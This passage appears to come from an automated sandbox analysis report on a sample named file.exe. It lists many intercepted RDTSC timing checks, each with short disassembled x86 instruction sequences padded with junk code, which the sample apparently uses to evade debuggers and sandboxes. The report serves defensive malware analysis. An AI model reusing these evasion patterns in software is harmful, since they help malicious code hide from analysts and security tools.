0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, edx 0x00000056 xchg eax, ebx 0x00000057 push esi 0x00000058 push eax 0x00000059 push edx 0x0000005a push ecx 0x0000005b pop ecx 0x0000005c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F7CC second address: F1F7D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F7D0 second address: F1F7E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jng 00007FD4A4ED8670h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20163 second address: F20167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20167 second address: F2016B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2584E second address: F25853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25853 second address: F25870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8679h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25870 second address: F25874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A66 second address: F24A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26868 second address: F2686D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28832 second address: F2883C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD4A4ED8672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2694F second address: F26968 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2883C second address: F2884B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD4A4ED8666h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F26968 second address: F2696C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2696C second address: F26975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F28F76 second address: F28F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F291C8 second address: F291DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2A10F second address: F2A119 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD4A4C5469Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F291DA second address: F291E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FD4A4ED8666h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C050 second address: F2C068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2B141 second address: F2B157 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4A4ED8668h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jns 00007FD4A4ED866Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30038 second address: F30052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD4A4C546A3h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F30052 second address: F30056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F301C2 second address: F301D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD4A4C54696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31139 second address: F31140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33DF7 second address: F33E0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A3h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F33E0E second address: F33E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F31237 second address: F3123B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34D99 second address: F34D9F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34D9F second address: F34DF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jbe 00007FD4A4C5469Ch 0x00000012 sub dword ptr [ebp+122D1A9Bh], ecx 0x00000018 pushad 0x00000019 js 00007FD4A4C5469Ch 0x0000001f mov esi, dword ptr [ebp+122D35EFh] 0x00000025 popad 0x00000026 push 00000000h 0x00000028 jmp 00007FD4A4C546A1h 0x0000002d push 00000000h 0x0000002f mov edi, eax 0x00000031 or ebx, dword ptr [ebp+122D1B20h] 0x00000037 push eax 0x00000038 push esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC11 second address: F3DC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC1F second address: F3DC2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C5469Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC2E second address: F3DC33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DC33 second address: F3DC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FD4A4C54696h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DD9F second address: F3DE06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD4A4ED8679h 0x0000000d jo 00007FD4A4ED8666h 0x00000013 jmp 00007FD4A4ED8677h 0x00000018 popad 0x00000019 je 00007FD4A4ED8671h 0x0000001f jmp 00007FD4A4ED866Fh 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DE06 second address: F3DE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DE0A second address: F3DE0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF6B second address: F3DF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43ABC second address: F43AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43AC2 second address: F43AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F43C01 second address: F43C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49863 second address: F49867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4854E second address: F4855D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD4A4ED8666h 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BA6 second address: F48BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BAA second address: F48BD0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD4A4ED8666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD4A4ED8674h 0x00000011 jne 00007FD4A4ED8666h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BD0 second address: F48BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BD8 second address: F48BE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48BE1 second address: F48BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48FBD second address: F48FE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD4A4ED8674h 0x0000000a jnl 00007FD4A4ED8666h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F48FE1 second address: F49011 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD4A4C546A3h 0x0000000f jmp 00007FD4A4C546A3h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F49011 second address: F49018 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4945A second address: F4945F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4945F second address: F49464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4D112 second address: F4D116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22834 second address: F22838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22838 second address: F01238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD4A4C5469Eh 0x0000000e jns 00007FD4A4C54698h 0x00000014 popad 0x00000015 nop 0x00000016 jnp 00007FD4A4C546A0h 0x0000001c lea eax, dword ptr [ebp+12497588h] 0x00000022 pushad 0x00000023 pushad 0x00000024 movsx ecx, di 0x00000027 jns 00007FD4A4C54696h 0x0000002d popad 0x0000002e xor dword ptr [ebp+122D2E25h], edi 0x00000034 popad 0x00000035 push eax 0x00000036 push esi 0x00000037 pushad 0x00000038 pushad 0x00000039 popad 0x0000003a jne 00007FD4A4C54696h 0x00000040 popad 0x00000041 pop esi 0x00000042 mov dword ptr [esp], eax 0x00000045 call dword ptr [ebp+122D2971h] 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22EC3 second address: F22EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FD4A4ED8673h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F18 second address: F22F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jnp 00007FD4A4C54696h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F32 second address: F22F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED8675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b mov dl, 5Fh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F56 second address: F22F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F5A second address: F22F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F5E second address: F22F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F64 second address: F22F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22F6A second address: F22F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BA00 second address: F1BA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 jbe 00007FD4A4ED8666h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F231C9 second address: F231E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F235D2 second address: F235E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FD4A4ED8666h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F235E0 second address: F23670 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4C546A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jns 00007FD4A4C54696h 0x00000015 popad 0x00000016 pushad 0x00000017 je 00007FD4A4C54696h 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FD4A4C54698h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c pushad 0x0000003d mov edi, dword ptr [ebp+12468027h] 0x00000043 mov dh, bl 0x00000045 popad 0x00000046 push 0000001Eh 0x00000048 mov edx, dword ptr [ebp+122D1A85h] 0x0000004e nop 0x0000004f jng 00007FD4A4C546A8h 0x00000055 jmp 00007FD4A4C546A2h 0x0000005a push eax 0x0000005b push edi 0x0000005c push eax 0x0000005d push edx 0x0000005e jne 00007FD4A4C54696h 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F239DC second address: F239F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD4A4ED866Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F239F2 second address: F239F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50857 second address: F50883 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD4A4ED8666h 0x00000008 jnc 00007FD4A4ED8666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FD4A4ED8679h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50883 second address: F5089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 jl 00007FD4A4C546AAh 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FD4A4C54696h 0x00000014 jno 00007FD4A4C54696h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50B39 second address: F50B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50B3F second address: F50B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50B43 second address: F50B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50B49 second address: F50B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50B4F second address: F50B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50B55 second address: F50B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50CF6 second address: F50D27 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD4A4ED866Fh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FD4A4ED8666h 0x00000011 jmp 00007FD4A4ED8676h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50D27 second address: F50D3A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FD4A4C546B3h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5108F second address: F5109F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FD4A4ED8666h 0x0000000a jno 00007FD4A4ED8666h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51330 second address: F51337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F594A5 second address: F594AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F594AB second address: F594D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jnl 00007FD4A4C54696h 0x0000000e jmp 00007FD4A4C546A5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59629 second address: F5962D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5962D second address: F59633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59633 second address: F59649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD4A4ED866Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59649 second address: F59650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59650 second address: F59677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4ED8676h 0x00000009 jmp 00007FD4A4ED866Dh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F591C8 second address: F591EB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FD4A4C546A9h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F591EB second address: F591EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F591EF second address: F591F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F59EAD second address: F59ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jmp 00007FD4A4ED8671h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5A1A9 second address: F5A1C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD4A4C546A9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6002D second address: F6004C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FD4A4ED8679h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
